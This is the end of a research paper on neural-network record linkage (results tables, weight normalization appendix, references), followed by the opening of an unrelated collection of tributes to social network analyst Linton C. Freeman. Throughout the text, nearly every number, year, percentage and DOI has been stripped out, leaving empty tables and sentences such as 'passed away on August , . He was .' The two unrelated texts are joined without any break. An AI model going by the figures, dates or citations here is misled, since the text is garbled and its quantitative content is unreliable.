variability. mlp based classification to allow a fair comparison, the tests using mlp classifier have followed the same schema of the the previous ones. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . 
/peerj-cs. figure results for multiple criteria similarity with threshold θ = . , weighted. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- figure results of the levenshtein test with mlp classifier. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- mlp levenshtein in this test, only the normalized levenshtein distance was used, likewise the homonym test with the threshold classifier. as can be seen, the results clearly outperform all previous ones. • comparing : levenshtein normalized distance only. • classifying : mlp based classifier. figure shows the results of the executions: the average precision is , % and the average recall is , %, with very low variability. mlp with multiple criteria in this test, multiple comparison criteria for each attributes have been used, likewise the homonym test with the threshold classifier. the results are almost perfect, especially for recall. in addition, the high precision allowed the manual control of the ‘‘false-positive’’ pairs, many of which are actually correct, but due to errors have a different fiscal code in the gold standard (see data sources). considering these fixes, precision reaches % in some cases. • comparing : each attribute is compared using the following comparators: (a) jaro–winkler, maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of test # for mlp classification. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- table experimental results summary: summarized results obtained through the mean values and standard deviation of the executions for each test. classifier comparators %precision %recall threshold levenshtein , %± , % , %± , % threshold all , %± , % , %± , % weighted threshold all , %± , % , %± , % multilayer perceptron levenshtein , %± , % , %± , % multilayer perceptron all , %± , % , %± , % (b) levenshtein, (c) cosine, (d) jaccard, (e) siresen-dice, (f) bigrams, (g) trigrams, (h) exact. • classifying : mlp based classifier. figure shows the results of the executions: the average precision is , % and the average recall is , %, with very low variability. summary results in table , a comprehensive view of the obtained results through the mean values and standard deviation of the executions is reported. conclusions first the various stages of the classic record linkage (rl) process have been presented, then a classifier based on multiple criteria and neural networks has been proposed in the classification stage of rl. specifically, the chaining of different similarity measures on different fields has been used as feature vector for the subsequent classification of record pairs based on multi-layer perceptron (mlp). the proposed feature vector plus mlp classifier has been tested on several real-world datasets belonging to geographically close maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure a levenshtein threshold. (a) the precision–recall curve generated on the training-set in experi- ment # ; the optimal threshold is tr = . . (b) the f -score when the threshold changes. full-size doi: . /peerjcs. /fig- banks and municipalities, scoring remarkably (please see table ) and clearly outperforming the threshold-based methods. 
neural networks, even with a shallow architecture and few nodes, proved to be effective classifiers and should be seriously considered for rl when even a modest amount of labeled data is available. acknowledgements the authors thank sadas s.r.l. (https://www.sadasdb.com/en/) for providing the necessary data and making their columnar database, proprietary technologies and research laboratories available. appendix precision recall curve in this section are shown in figs. a –a , for each threshold-based test, the precision–recall curve generated on the training-set database pair (a, b). these curves were used to determine the optimal threshold value for classifiers. weight vector estimation in this section, the methodology used in experiment for the weights estimation is described. the weight vector has as many components as there are attributes selected for the rl each of which is calculated as: wi= log‖suppai‖ log‖ai‖ · log‖suppbi‖ log‖bi‖ ( ) where ai and bi are the multi-set values of the corresponding i-th attribute of the first and second table respectively. the notation supp· indicate the support, i.e., the set of unique items in multi-set and ‖·‖ denotes the cardinality. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.sadasdb.com/en/ http://dx.doi.org/ . /peerj-cs. figure a multiple criteria threshold. (a) the precision–recall curve generated on the training-set in experiment # ; the optimal threshold is tr = . . (b) the f -score when the threshold changes. full-size doi: . /peerjcs. /fig- figure a weighted multiple criteria threshold. (a) the precision–recall curve generated on the training-set in experiment # ; the optimal threshold is tr = . . (b) the f -score when the threshold changes. full-size doi: . /peerjcs. /fig- this measure takes into account both the number of distinct values and the size difference of the two tables. weight vector normalization in this section are shown, the vector normalization technique and then, for each normalization base function, in fig. a , the precision–recall curve generated on the training-set database pair (a,b). these curves were used to select the best type of normalization. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure a (a) the precision–recall curves generated on the training-set in experiment # for each of the normalization techniques; (b) a zoomed view of the same curves. the relative winner, in terms of precision and recall, was the quadratic normalization, but results of higher quality and lower variance were obtained using a logarithmic function. full-size doi: . /peerjcs. /fig- normalization to alter the contribution of the various attributes during the classification while maintaining unchanged the weighted sum of the components of the similarity vector, a normalization of the weight vector is necessary. given a weight vector w=(w ,w ,...,wn) and same base function f a normalized vector ŵ=(ŵ ,ŵ ,...,ŵn) can be obtained simply by applying element-wise the equation: ŵi= f (wi)∑n j= f (wj) ( ) i.e., applying the function f to each element of the input vector wi and normalizing these values by dividing by the sum of all these values; this normalization ensures that the sum of the components of the output vector ŵ is . 
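the weight estimation above only needs the number of distinct values (the support) of each attribute in the two tables. a minimal sketch under assumed data structures (each table as a list of dicts keyed by attribute name); this is an illustration, not the code shipped with the paper:

```python
import math

def attribute_weights(table_a, table_b, attributes):
    """one raw weight per attribute: product of log(#distinct)/log(#rows) in each table.
    assumes both tables have more than one row and every attribute has at least one value."""
    weights = []
    for attr in attributes:
        col_a = [row[attr] for row in table_a]
        col_b = [row[attr] for row in table_b]
        wa = math.log(len(set(col_a))) / math.log(len(col_a))   # log||supp a_i|| / log||a_i||
        wb = math.log(len(set(col_b))) / math.log(len(col_b))   # log||supp b_i|| / log||b_i||
        weights.append(wa * wb)
    return weights
```

the normalized weight vector actually used in the experiments is then obtained by applying one of the base functions described next and dividing by the sum of the transformed components.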
the tested base function f are listed below: linear: f (x)=x quadratic: f (x)=x cubic: f (x)=x logaritmic: f (x)= log( +x) softmax: f (x)=ex inverse: f (x)=x− precision–recall curves results for both overall precision and recall among the various possibilities of normalization: linear, max, quadratic, exp ... logarithmic. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • antonio maratea conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • angelo ciaramella analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • giuseppe pio cianci performed the experiments, authored or reviewed drafts of the paper, performed the computation work, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: the data, code, and a readme file are available in the supplementary files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aiken vcf, dórea jrr, acedo js, de sousa fg, dias fg, de magalhães rosa gj. . record linkage for farm-level data analytics: comparison of deterministic, stochastic and machine learning methods. computers and electronics in agriculture : doi . /j.compag. . . batini c, scannapieco m. . data quality: concepts, methodologies and techniques. berlin: springer. batista geapa, bazzan alc, monard mc. . balancing training data for automated annotation of keywords: a case study. batista geapa, prati rc, monard mc. . a study of the behavior of several methods for balancing machine learning training data. acm sigkdd explorations newsletter ( ): – doi . / . . bowyer kw, chawla nv, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research : – doi . /jair. . brizan dg, tansel au. . a. survey of entity resolution and record linkage method- ologies. communications of the iima ( ): . maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.compag. . http://dx.doi.org/ . / . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /peerj-cs. christen p. . a survey of indexing techniques for scalable record linkage and dedu- plication. ieee transactions on knowledge and data engineering ( ): – . christen p. . data matching: concepts and techniques for record linkage, entity resolution, and duplicate detection. berlin, heidelberg: springer-verlag. christen p, goiser k. . quality and complexity measures for data linkage and dedu- plication. in: quality measures in data mining. studies in computational intelligence, berlin, heidelberg: springer-verlag, – . di cicco v, firmani d, koudas n, merialdo p, srivastava d. . interpreting deep learning models for entity resolution: an experience report using lime. in: proceedings of the second international workshop on exploiting artificial intel- ligence techniques for data management, aidm ’ . 
Connections (INSNA), Issue | Vol. , Article | DOI: . /connections- -
© Authors. This work is licensed under the Creative Commons Attribution License (http://creativecommons.org/licenses/by/ . /).

A Collection of Tributes to Linton C. Freeman

Russ Bernard, Elisa Bienenstock, Steve Borgatti, Ulrik Brandes, Ron Burt, Carter Butts, Pat Doreian, Tom Fararo, Katie Faust, Jeff Johnson, Alaina Michaelson Kanfer, David Krackhardt, John Skvoretz and Barry Wellman

This collection of tributes to Linton C. Freeman is meant to remind us that the field of social network analysis is marked by shared connections, intellectual and social, and by the role that Lin and Sue, his wife and partner, played in creating them. Lin's friends, students and colleagues tell us their stories of Lin, and through them we learn about Lin the man, the professor, the scientist, the dean, the mentor, the editor, the teacher, the friend, and the networker. The contributors to this collection of tributes are Russ Bernard, Elisa Bienenstock, Steve Borgatti, Ulrik Brandes, Ron Burt, Carter Butts, Pat Doreian, Tom Fararo, Katie Faust, Jeff Johnson, Alaina Michaelson Kanfer, David Krackhardt, John Skvoretz, and Barry Wellman.

In Memoriam: Linton C. Freeman
Katie Faust and Carter Butts

Linton "Lin" Freeman, sociology research professor at the University of California, Irvine, passed away on August , . He was . Freeman served as dean of the UCI School of Social Sciences from to . He retired from UCI in and continued on as a research professor in sociology, teaching courses in social network analysis. Prior to his UCI service, Freeman held professorships at Syracuse University ( - ), the University of Pittsburgh ( - ), the University of Hawaii ( - ), and Lehigh University ( - ), where he was the Lucy G. Moses Distinguished Professor of Sociology.

Freeman was a mathematical sociologist whose research focused on social network analysis. He used formal models and network analyses of empirical data to answer questions about how and why groups form. He was author or coauthor of books and more than scholarly articles that appeared in a diverse array of journals including the American Anthropologist, Animal Behavior, Social Cognition, Social Networks, and Social Forces, to name a few.

Lin was born in Chicago in and grew up near the University of Chicago. He was named after the anthropologist Ralph Linton, one of his father's closest friends.
As Lin told the story, Ralph was doing field work in Madagascar at the time of Lin's birth, and his father "somehow managed to embrace a very quaint Victorian notion that it was perfectly all right to take a person's last name without asking, but you could not take their first name." So, instead of Ralph Freeman, we had Lin Freeman.

Lin was a towering figure in social network analysis, one of the pioneers of the field, and a major contributor to a wide range of topics in the discipline. It is difficult to find an area of social network analysis that has not been influenced by his work.

Lin received his bachelor's in psychology and sociology from Roosevelt University, his master's in sociology and anthropology from the University of Hawaii, and his doctorate in sociology from Northwestern University. His early career is marked by major contributions to the study of community decision making and leadership, research done at Syracuse University in collaboration with Morry Sunshine, Sue Freeman, Tom Fararo, and Warner Bloomberg.

Late in his long career, Lin outlined his own view of the history of the field in an influential book, The Development of Social Network Analysis: A Study in the Sociology of Science ( ). Written in response
beyond his research contributions, lin was also a pivotal player in the institutionalization of the field. he founded the flagship journal social networks and edited it from to . this journal was one of the important institutional advances of mid- s that helped to consolidate the interdisciplinary field of social networks. the journal continues to be the central outlet for social network research and pro- vides a focal point for contributions from a wide range of disciplines. a careful student of publication practices across disciplines, lin consciously mod- eled his editorial approach at social networks after successful examples in the broader scientific com- munity. his contributions to building social networks as a scientific discipline were also supported by the national science foundation-funded electron- ic information exchange system (eies) experiment, work done in collaboration with sue freeman. at the dawn of the internet in - , this project provid- ed then state-of-the-art computer communications capabilities (phone modems and computer termi- nals) to link several dozen scientists working in the emerging field of social networks. the goal of the experiment was to facilitate exchange of information about the rapidly developing discipline, but it also highlights lin’s continued fascination with the social context of scientific enterprises. he was also an ac- tive supporter of the international network for social network analysis (insna), the professional organ- ization of the network analysis community, and its flagship meeting, the sunbelt conference. some of lin’s personal predilections (including his passionate advocacy for conference logistics that would allow him to windsurf, as well as his determination that the meeting always be welcoming to newcomers) left a lasting mark on the culture of the conference. al- ways an evangelist for social network analysis, lin worked tirelessly to bring new researchers into the field – whatever their home discipline might have been. it is a testimony both to his tenacity and to his charisma that one can to this day find many social network researchers whose entree into the field was an encounter with lin. lin’s own exposure to structural and network perspectives started early and ran deep. his father was a genealogist who emphasized the importance of family relations. as an undergraduate at roo- sevelt university, lin’s mentor was st. claire drake, by all accounts a genuine intellectual and captivat- ing lecturer. drake had been a student of allison davis at the university of chicago and had worked on the now classic deep south study (allison davis, burleigh b. gardner, and mary r. gardner, ). drake introduced lin to the deep south research in the late s, so at that point lin would have encountered the quintessential two-mode network of southern women attending social events (as an aside, decades later lin published “finding social groups: a meta-analysis of the southern women data”, a review of more than studies that had analyzed the davis, gardner, and gardner data.). at the university of hawaii, the geographer for- rest pitts introduced him to hägerstrand’s diffusion models and harry ball pointed him toward bavelas and leavitt’s experimental work on communication connections (insna) structures. as a phd student at northwestern, lin was deeply influenced by don campbell, who was at the height of his work on reliability, validity, and measurement, themes that continued throughout lin’s own research. 
lin also met morry sunshine at northwestern and they embarked on a very fruitful series of studies of community leadership. lin iden- tified morry as someone who was most influential on his thinking and the two remained close friends. lin moved to uc irvine in as dean of the school of social sciences. at uci he joined an ac- tive group of social network faculty and graduate students, including john boyd, doug white, and lee sailer. lin quickly converted others to social net- works, notably kim romney and bill batchelder, and influenced a steady stream of graduate students (jeff johnson, david krackhardt, katie faust, steve bor- gatti, sue freeman, and alaina michaelson kanfer, to name a few from lin’s early years at uci). at the time of his arrival, there were no departments in the school of social sciences. lin’s presence was the catalyst for the formation and steep ascent of the uci social network research group, a focal point for re- search and training at irvine that continues to be ex- tremely active. he also helped establish one of the first systematic graduate curricula in social networks within the department of sociology, which has gone on to become the training ground for a large number of doctoral students (both from sociology and from other fields). a member of the institute for mathemati- cal behavioral sciences, he also boosted the visibility of network-related research within the institute, and was central in recruiting social network researchers to uci. lin received a number of awards for his contribu- tions during his career. among his more notable hon- ors, he held the unique distinction of being a two-time recipient of the georg simmel award from the inter- national network for social network analysis, and re- ceived the james s. coleman distinguished career award in mathematical sociology from the mathe- matical sociology section of the american socio- logical association. in , insna named the early career award for contributions to the study of social networks after him, recognizing not only his own re- markable intellectual accomplishments but also his long record of mentoring and supporting young peo- ple. for many junior colleagues who survive him, this is perhaps the most fitting honor for a man who gave so much of his time to encouraging others in their own research. for those who had the good fortune to work closely with him, lin is remembered as a person of infectious enthusiasm, great intellectual energy, and strong convictions. never shy about express- ing his opinions – often in forceful language – lin was always willing to engage in intellectual debate. but he also took criticism graciously, and encour- aged a spirit of no-holds-barred inquiry among his peers that was at once fun, rigorous, and irrever- ent. he brought out the best in his students and his colleagues alike, challenging them to be better sci- entists, to pursue the truth wherever it led, and to enjoy life along the way. he left his mark on the so- cial network field, on uc irvine, and on all of us who benefited from his presence. those who travel in the wake of the “big kahuna” (so dubbed by a number of his colleagues) have a lot to live up to. but we are richer for his many gifts to us, and, were he here, he would be urging us to sail on to shores he had not yet seen. we hope that our collective voyages do honor to his memory. an open door jeff johnson there are many reasons to celebrate the life and career of lin freeman. 
as cart- er and katie point out, he has been one of the most influential intellects in social network analysis. but what i most celebrate about lin was his kindness, open- ness, and, most of all, his mentorship. i believe a sto- ry about my time at uc ir- vine as a graduate student vividly illustrates this. i was a graduate student from to . during the latter three years of this lin was the dean of the school of social scienc- es. the school of social sciences at uci was itself a unique place. there were no departments and faculty from across the social sciences had offic- es among the seven floors that were assigned in no particular disciplinary pattern. so, a geographer could be next to a political scientist who was next to an economist and so on. this led to a very dif- ferent academic environment. although i was an anthropologist, i interacted extensively with psy- chologists, economists, sociologists, etc. the dean before lin, and eventually lin, had his office on the th floor of the social science tower. although the dean’s office had a door that directly accessed the hallway, the door was always shut and any access to the dean’s office was through an adjoining sec- a collection of tributes to linton c. freeman retary’s office, with the secretary as gatekeeper. so as a graduate student before lin’s time, i had very little interaction, if any, with the dean (i can’t even remember seeing him). i remember the buzz about the arrival of the new dean, an athletic look- ing man with a full head of white hair. however, as a graduate student i thought little of it since, as the who sang, “meet the new boss, same as the old boss.” but these expectations were quickly dashed. soon after lin took over as dean, i would notice the door to the dean’s office that opened to the hallway was occasionally open, wide open, with lin often at his desk, at times with his feet on it. i don’t exact- ly remember how it all transpired, but i eventually found myself in his office talking about something networks or something windsurfing or something hawaii, since both of us had spent time at the uni- versity of hawaii. here i was, a graduate student having conversations with the dean across a whole range of topics, and not just once, but regularly. i could not have fathomed at the time how unique this really was for a broad range of reasons. a par- ticularly memorable discussion in his office cen- tered on the validity and reliability of respondent’s self-reports of social network interactions. russ bernard, peter killworth, and lee sailer (an irvine graduate) had just come out with the first of a series of papers on the problem of informant accuracy in the collection of social network data. i remember a number of lively discussions about the topic with lin and they were incredibly stimulating. lin would talk about things with conviction and passion and with a style that i would, over the course of my aca- demic life, try to emulate. these discussions about informant accuracy, not just with me but with many others, led to, in my mind, an exciting intellectual period examining many aspects of informant accu- racy that contributed to not only breakthrough’s in social network analysis, but also in the study of cul- ture. over time the open door was not just limited to lin’s office. eventually the door to lin and sue freeman’s house was also open to me. often when i was in laguna, where they lived, i would stop by and talk with both lin and sue. their hospitality and mentorship extended well into my academic career. 
in retrospect both lin’s and sue’s kindness and mentorship was a gift. i am now a full professor at a research one univer- sity. i often walk by the office for the dean of the col- lege of arts and sciences at my university. despite my advanced status, the dean’s door is not open. lin’s open doors are a testament to his character and uniqueness, and a vivid reminder of the human being he was and will always remain in my memory. forever connected: linton c. freeman alaina michaelson kanfer i first met lin in the summer of , at a new graduate student picnic when sue freeman, his wife, ran up to me, grabbed my arm, asserted “you belong with us,” and pulled me over to meet lin. they were partners; in networks, in science, and in life. that is how i experienced lin and sue. and that is how they mentored me, at uc-irvine and beyond. when lin was getting impatient for me to final- ize my dissertation topic, i simply could not choose. should i contribute a methodology for role analysis following lorrain and white, or should i investigate the how social relationships impact the diffusion of in- novations in the spirit of ev rogers? sue listened pa- tiently and proposed the perfect solution: why not do both? aha! the role of social relationships in the diffu- sion of a scientific specialty, specifically, role analysis. thank you, lin and sue, for helping me crystalize my lifelong interest in the sociology of science. while he was simply “lin” with his doors open, and feet on the desk in his social science tower office at uci, i saw him transform into linton freeman the ele- gant speaker at the sunbelt conferences. in his dress beach clothes (long pants and shoes – sandals) he would saunter into a large packed meeting room. with a booming voice, and piercing eyes that softened into an impish grin he would take the spellbound audience along with him on his intellectual journey to construct a definition, devise a method or discover an answer. lin was a consummate story-teller. lin was a great teacher. he could take any task or idea, break it down step by step and communicate it. he was such a good teacher, in fact, that he could take a city-girl from the midwest, with no athletic abil- ity, and teach her how to race in windsurfing regattas! he would explain how to prepare a meal – kung pao chicken, korean kalbi, osso bucco – with the same precision and enthusiasm as explaining betweenness connections (insna) centrality. to this day i cannot peel a tomato in boiling water without thinking of lin. i think lin’s skill at teaching stems from his love of the subject, a genuine desire to share, and his focus on simplicity. a simple answer. a simple explanation. any complex idea could be broken down into sim- pler steps. lin asserted that the only reason math ap- pears confusing is because the teacher is making it confusing. his explanation for that: either the teacher doesn’t understand it, or even more nefarious, they make math sound confusing so they can appear smarter! i had the privilege of witnessing clear math communication when i was sue’s teaching assistant. this was a required course – statistics – and students voluntarily filled the social science lecture hall. they listened, they learned and they enjoyed. learning to windsurf was so much more impor- tant to me than i imagined. 
by including me in their beach culture, lin and sue modeled a good “work/ life balance.” never missing an opportunity to study a network, we perfected participant observation data collection on the beach; social networks among windsurfers! but looking back, the most important part of windsurfing was the time it gave me with lin, driving to and from dana point, doheny beach, or on more ambitious days, mission bay in san diego. dur- ing those rides we talked about everything. lin reg- ularly gave me mini-lectures about his views on how a social group is defined by proximity, similarity, and common fate which he learned from don campbell at northwestern. he was fascinated with the work of eleanor rosch on cognition and categorization and spent quite a bit of time trying to figure out how her results translated to social networks. we also talked about the world. about the human race and scary things like nuclear war. lin reassured me that with every step we take backward, we take two steps forward. this belief has helped sustain me through- out my career as i found myself at the epicenter of revolutionary new technologies, such as the internet browser and social media, and now genomics, which have the potential for bad, and good. i think lin was an optimist. as opinionated, and obstinate as lin appeared, i knew him to be extraordinarily open-minded. he thought i was crazy when i talked about the sense of smell in networks, however, every few years he sent me an article or book implicating olfaction in networks among human and other creatures. the scientific journals in which he chose to publish is a testimony to lin’s intellectual range, for instance, journal of social and biological structures, brain and behavior sci- ence, international journal of man-machine studies as well as classics like american journal of sociolo- gy and american anthropologist, garnering well over , citations to date according to google scholar. all this while he was establishing the journal social networks as a conscious effort to transform the field into a normal science. when my life and career veered outside the inner circle of social networks, lin and sue’s genuine in- terest in me, my family and my work never waned. recently, in response to my email updating them on my role at the carl r. woese institute for genomic biology, lin wrote to me, “glad to hear you are still learning. that’s my favorite activity.” clear thinking, open mindedness, optimism, work/ life balance, and a love of learning, especially when it comes to science. this is what i learned from lin freeman, my advisor. i am thankful to him and to sue for their mentorship and friendship, and i am thankful to the social network community for this opportunity to reflect and share. lin freeman was my mentor steve borgatti i started graduate school (uc-irvine, school of social sciences) in to study cognitive anthropology. af- ter a couple of years, i left school to work at a consult- ing company (selling “cultural services”), then moved to a more conventional market- ing research firm, and then came back to school. when i came back, everything was different. the freemans had arrived. i didn’t take to them right away. they seemed almost too magnificent. it was like having a king and queen of the school of social sciences. 
and it bothered me that during presentations, they would keep scanning the audience instead of fixing their full attention on the speaker (little did i know that, just a few years later, they would publish a terrific paper (freeman, romney and freeman, ) based on at- tendance at colloquium). things changed when i moved to an office on the th floor of the social science tower, where lin’s office was located. his door was always open, and there were always people in there, if not forming a cluster at the door. often the discussion took the form of a debate and was about something scientif- ic, for lack of a better word. i remember at least two days of discussion about discrete versus continuous models of social reality. a collection of tributes to linton c. freeman even though i loved cognitive anthropology, over time, my dissertation became wholly networky, and my advisor kim romney booted me over to lin. lin was an intense mentor. he had very strong views (or, at least, very strong expressions of views). for exam- ple, i remember him telling me in no uncertain terms that no student of his was going to read mainstream sociology journals: they would rot your brain and crip- ple your thinking. i was also never to use lisrel – a substitute for thinking. and when i said something he didn’t like, he would say no! with a very expressive combination of hurt, disbelief, and exasperation in his voice. he really cared about what you said and did not tolerate bullshit. lin never talked to me about my career. he didn’t tell me how to get a job, how to prepare to be a pro- fessor, how to review a paper – anything about the professional side of the business. what he did do was try to develop me intellectually. one of his mentoring techniques was to ask me to look at a measure and see how it related to other measures. the first one he asked me to do was robinson’s a, which i spent a week analyzing. another was his own segregation measure s. these exercises were invaluable because they taught you that there are underlying grammars to measures, and obvious locations where different options may be taken. they taught you to see under- lying similarities and differences. lin once told me with some passion that the most important distinction in social network analysis was r.h. atkin’s distinction between backcloth and traffic. so i read atkin ( ) and didn’t understand a word of it. but the distinction and the weight lin placed on it stuck with me. i now realize that several of my best papers are essentially elaborations of that distinction. what i loved most about lin were his presenta- tions. there are a lot of great speakers in our field, but lin was amazing. he had an incredible voice and physical presence, and he had a mesmerizing sto- ry-telling style. i used to sit in on his undergraduate networks class just to hear him tell the foundational tales of our discipline. i especially loved his truly dra- matic reading of the bavelas-leavitt experiments. but more than that, a wonderful and important thing about lin was that his conference presentations were exactly like his classes. the objective was always to explain an idea. obfuscating, dressing up, over-complicating, name-dropping, reifying, over-promising and p-hack- ing were simply not part of the equation. many of his talks would begin with a simple observation and start drawing out implications that had gone unnoticed – like a forensic pathologist saying ‘do you see this line here? 
that could only have come from a large weight attached to the other side of the body [….].” i thank lin for my career, including everything from the long arm of his social capital to his wax-on wax- off attempts to get me to think deeply and not just sufficiently. lin freeman was my mentor. in memoriam: tribute to linton freeman russ bernard my introduction to lin’s wonderful eclectic schol- arship goes back to , when i was a graduate stu- dent of anthropology. i was fascinated by the possibility of using cultures as units of analysis in a statistical study. and so, my intro- duction to linton freeman’s work was his article on using guttman’s method for scaling societal complexity and then his book, elementary applied statis- tics. in , when i was working with peter killworth at scripps institution of oceanography, in san diego, i heard about some conferences on network analysis being held in hawaii by linton freeman and realized that was the same linton freeman who had written my stats text. later that year, i went to west virginia university, in morgantown and a year later, the math- ematical social science board of the social science research council funded my proposal to hold a con- ference on social network analysis at cheat lake, west virginia – a sylvan, idyllic spot near the univer- sity. i was thrilled when lin accepted my invitation to the conference. by then, lin was teaching at lehigh university in bethlehem, pennsylvania, about miles from morgantown, having recently arrived from dalhousie university in halifax, canada. and why was lin in halifax? because, as lin ex- plained it to me, after four years of living in a lease- hold bungalow on the water in hawaii, he had no pension and he and sue had no house. he accepted an endowed chair at dalhousie and then another at lehigh within a year. he was, he said, edging his way back to hawaii. in december , i attended a conference in ha- waii that lin had called at the east-west center on the campus of the university in honolulu and learned that lin was still trying to get back there. he took several of us out on a hobey cat and steered it close to the shore, so we could all see the house he and sue had lived in while he was at the university there. i still laugh connections (insna) every time i remember that scene: lin waxing poetic, going on about living on the island, water sports, and social networks. in , he and sue managed to get to california … only about two-thirds of the way back to hawaii from halifax, but they did manage to get a really nice house. i miss lin’s wit and his impatience and his un- relenting enthusiasm for science and for passing it all on. lin was an inspiring teacher and he never stopped teaching. even now. linton freeman – the networker barry wellman lin freeman was always at sunbelt social net- work conferences – and always visible – he invaria- bly stood in a central spot outside the meeting rooms schmoozing with whoever came along. i used to be annoyed at lin because he never, ever came to hear one of our team’s talks. but then i realized that he was doing what he did best – networking with every- one – and mysteriously, he knew what everyone was doing, from his central spot in the hallway. it is only as i write this remembrance that i real- ize that lin’s key scholarly writing professed what he practiced. he was between us all – at the sunbelt, on socnet, and in-person. 
his most cited scholarly articles by far are about “betweenness”: “centrality in social networks conceptual clarification” ( ) has , cites (september , ), followed by “a set of measures of centrality based on betweenness” ( ) with , and the later ( ) “centrality in valued graphs: a measure of betweenness based on network flow” – coauthored with steve borgatti and doug white – with . and the second biggest cita- tion is to various forms of the ucinet software (devel- oped with steve borgatti, martin everett) and others that help us to discover betweenness, et al. among our research subjects. lin was a networker from before the instant when i first met him. in the early s, he and his wife/ partner sue freeman organized an nsf-supported online network of about a score of social network scholars: a listserv before there was such a thing. it turned out we didn’t have much to say to each other on a daily basis, but lin and sue were smart enough to organize an in-person meetup at his then-home base of lehigh so we all bonded in-person as well as online – just at the start of the self-conscious devel- opment of the social network movement. then, until their sad recent passing, lin and sue were a great team – thinking, organizing, and playing together. while the nsf experiment nicely foreshadowed the internet, lin’s two foremost accomplishments were just beginning. those at uc irvine can tell you about lin’s relentless leadership in forging a strong social network analytic movement there. but to my mind, lin’s even more important leg- acy was his lead in the mid- s in founding and editing our social networks journal. he thought of it and secured the contract with elsevier, when social network analysis was scarcely known. importantly, lin lead the way in defining the journal as a broad journal of “structural analysis” – connecting theory and substance with the methodological innovations that social network analysis is sometimes limited to. betweenness was not a measure – it was a way of thinking. lin’s work was a key to the mid- s transforma- tion of social network analysis from a vague move- ment to a coherent program. it was part of a triad: lin and the journal working separately but together with russ bernard and associates founding the an- nual sunbelt social network conference, and bev wellman and i founding insna – the international network for social network analysis. lin gave his passion to linking social science with mathematics in thinking about social networks. a deep networker, he developed and linked the ideas and people that have helped to define our field broadly and move it forward. and he was a strong supporter of colleagues such as steve borgatti, katie faust, and stanley wasserman as they developed the methodological vocabulary and tools to enable systematic research. i close with a characteristic story: one night the phone rang with lin on the line. “it turns out that our founding mother, elizabeth bott, was raised in toronto a collection of tributes to linton c. freeman by interesting parents. could you help me find out more?” yes, i could and the results are in our only written co-production, “a note on the ancestral to- ronto home of social network analysis” – in which we showed that young elizabeth bott was the first child to wear a snowsuit (connections , november, : pp. - ). this was mostly a lin show, and it was a treat to work with him. he was a lover of life, ideas, windsurfing, food, mentoring – and ideas. 
bev and i fondly recall seeing him at the sunbelt – net- working in his vividly-colored shirts. “let’s be serious – but casual,” lin would say – and role model. right man, right time ron burt lin freeman was a man of generosity and scien- tific elegance who found his time. that he no longer walks this earth is a knife to my heart. i am grateful to katie faust and carter butts for crafting their broad appreciation of lin. there is left to add only our idio- syncrasies. i highlight two by which i learned to distin- guish and admire lin. i was first struck by lin’s generosity. i met lin in the late s, when i was a new assistant professor and he was a senior professor at lehigh university. as lin describes in his development of social net- work analysis, social network analysis (sna) in the s was fragmented, wide open for the application of alternative points of view. it was exciting, but it was also lonely. lin provided a sense of community. lin drew you into intellectual challenges that engaged your mind in the company of others similarly challenged. lin didn’t give you a membership so much as he brokered con- nections between people likely to find one another engaging. the sense of community emerged as a by-product of shared intellectual engagement. lin did this through his teaching (ask david krackhart how he got into network analysis), through his conferences (from which i retain so many memories of friendships emergent), and through his journal, social networks, and his concomitant early work on bits of software that became ucinet. i was among those who argued with lin against creating the journal (i and others pre- ferred the goal of taking over a mainstream institution to assert the legitimacy of sna). at the same time, lin and i were discussing computer subroutines and i ar- gued that it would be better to have special-purpose software targeted for substantively successful kinds of analysis versus generic software that did a little bit of everything (personal computers were smaller back in the day – my first network software for a personal computer ran on an osborne). what i missed in my arguments was the important role that a journal and software would have in creating a sense of community. outside a few people asso- ciated with prominent university centers, social net- work analysis was a fugitive enterprise in the s. i, like so many others, felt that we were on the outside looking in. and i, like so many others, found intellec- tual community around lin freeman. it was a per- fect example of an invisible college network – people connected indirectly through their strong admiration for a central figure. perhaps lin had a such a good feel for young fugitive scholars perhaps because he had spent much of his own career on the edge of the mainstream. this is what i meant by lin finding his time. at the same time that lin brought community to social network analysis, sna gave lin a community to lead. to my mind, there is currently no scholar in sna with lin’s generous charisma, but it is also true that sna is no longer the fugitive enterprise it was, in need of the charisma lin brought to us. it would be difficult for a guru to pull together today the commu- nity that lin successfully created back in the day. lin and sna met at a time when each was a blessing to the other. the second of lin’s qualities that stays with me is his scientific elegance. he had a taste for simple, rep- licable prediction. he admired it in others, and took me to task when he (often) found it absent in my work. 
